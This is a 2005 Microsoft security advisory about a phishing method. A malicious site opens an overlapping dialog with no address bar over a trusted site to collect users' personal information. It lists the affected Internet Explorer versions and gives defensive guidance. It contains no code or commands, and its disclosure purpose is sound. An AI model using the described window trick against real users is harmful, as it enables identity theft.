Security Advisory
Microsoft Security Advisory 902333
Browser Windows Without Indications of Their Origins may be Used in Phishing Attempts
Published: June 21, 2005
Microsoft has investigated a public report of a phishing method that affects Web browsers in general, including Internet Explorer.
The report describes the scenario of multiple, overlapping browser windows, some of which contain no indications of their origin. An attacker could arrange windows in such a way as to trick users into thinking that an unidentified dialog or pop-up window is trustworthy when it is in fact fraudulent. When a user visits a malicious Web site the user may be redirected to a trusted Web site. The attacker could then display an overlapping window in the form of a dialog box attempting a phishing attack. The user is then prompted to input personal information into this dialog box, which was opened from the malicious Web site. The user might believe that this dialog box was opened by the trusted Web site and they might input personal information. However, this information is sent to the malicious Web site.
Customers who already follow our general guidance about avoiding spoofing and phishing attacks are at reduced risk of being affected by this issue. If a particular window or dialog box does not have an address bar and does not have a lock icon that can be used to verify the site’s certificate, the user is not provided with enough information on which to base a valid trust decision about the window or dialog box. To view Microsoft’s general guidance about how to avoid spoofing attacks visit the Security at Home Web site.
We continue to encourage customers install Windows XP SP2 and to follow our Protect Your PC guidance of enabling a firewall. This includes turning on Automatic Updates to receive software updates and installing anti virus software. For more information visit the Protect Your PC Web site.
Customers who believe they may have been affected by this phishing method can contact Product Support Services. You can contact Product Support Services in North America at no charge using the PC Safety line (1866-PCSAFETY). International customers can contact Product Support Services by using one of the available methods found at the Microsoft Security Help and Support for Home Users Web site.
General Information
Overview
Purpose of Advisory: To clarify the risks associated with browser windows without indications of their origins and provide guidance on how to help prevent identity theft from phishing scams.
Advisory Status: Advisory Published, No Security Update Planned.
Recommendation: Review the suggested actions and configure as appropriate.
| References | Web site |
|---|---|
| Help prevent identity theft from phishing scams | Security at Home Web site |
| Protect Your PC | Protect Your PC Web site |
This advisory applies to the following software.
| Related Software |
| Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3 |
| Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 |
| Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3, on Microsoft Windows 2000 Service Pack 4, or on Microsoft Windows XP Service Pack 1 |
| Internet Explorer 6 for Microsoft Windows XP Service Pack 2 |
| Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) |
| Internet Explorer 6 for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 |
| Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems, Microsoft Windows Server 2003 with SP1 for Itanium-based Systems, Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium), Microsoft Windows Server 2003 x64 Edition, and Microsoft Windows XP Professional x64 Edition |
| Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition |
| Internet Explorer 6 Service Pack 1 on Microsoft Windows 98, on Microsoft Windows 98 SE, or on Microsoft Windows Millennium Edition |
| Internet Explorer 5.1 for Macintosh |
Note The Web browsers that are enumerated here are the currently supported Internet Explorer versions. However, this functionality is not limited to Internet Explorer but is common to many Web browsers.
Frequently Asked Questions
What is the scope of the advisory?
This advisory clarifies the current behavior of overlapping windows from different origins in Internet Explorer. This functionality is not limited to Internet Explorer but is common to many Web browsers.
What causes this situation?
Common to various browsers, including Internet Explorer, it is possible to have multiple, overlapping browser windows. An attacker could arrange windows in such a way as to trick users into thinking that an unidentified dialog or pop-up window is trustworthy when it is in fact fraudulent. When a user visits a malicious Web site the user may be redirected to a trusted Web site. The attacker could then display an overlapping window in the form of a dialog box attempting a phishing attack. The user is then prompted to input personal information into this dialog box, which was opened from the malicious Web site. The user might believe that this dialog box was opened by the trusted Web site and they might input personal information. However, this information is sent to the malicious Web site.
Will Microsoft issue a security update to address this threat?
No. This is an example of how current standard Web browser functionality could be used in phishing attempts.
Suggested Actions
For more information about how to help protect yourself online, visit the following Microsoft Web sites:
Other Information
Resources:
- You can provide feedback by completing the form at the following Web site.
- Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services. For more information about available support options, see the Microsoft Help and Support Web site.
- International customers can receive support from their local Microsoft subsidiaries. For more information about how to contact Microsoft for international support issues, visit the International Support Web site.
- The Microsoft TechNet Security Web site provides additional information about security in Microsoft products.
Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
Revisions:
- June 21, 2005: Advisory published
Built at 2014-04-18T13:49:36Z-07:00